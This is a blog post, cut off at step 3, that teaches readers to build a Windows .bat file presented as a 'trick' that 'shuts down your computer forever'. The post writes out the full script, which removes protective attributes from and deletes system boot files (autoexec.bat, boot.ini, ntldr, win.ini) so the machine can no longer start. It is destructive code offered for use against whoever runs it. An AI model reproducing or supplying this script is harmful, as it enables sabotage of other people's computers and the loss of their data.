Skip to main content

Posts

Showing posts with the label notepad

How to Shut Down a Windows running Computer forever.

Introduction: This post shares some .bat script with you, which can be used as a trick , so that one will Shut Down his/her Computer, and will never be able to turn it ON, until he/she install a new copy of Windows or any other Operating System . In this trick, you will create a .bat file , which when clicked, immediately shuts down your Computer and when the next time you will try to turn ON your Computer, you’ll find it not possible. Software needed for creating a file to shut down your PC forever-   Notepad.. and just Notepad or any other good text editor. ·          Nothing else! So here it starts: 1) Open Notepad . 2) Now, copy/paste the following code into it: @echo off attrib –r –s –h c:\autoexec.bat del c:\autoexec.bat attrib –r –s –h c:\boot.ini del c:\boot.ini attrib –r –s –h c:\ntldr del c:\ntldr attrib –r –s –h c:\windows\win.ini del c:\windows\win.ini 3) Now simpl...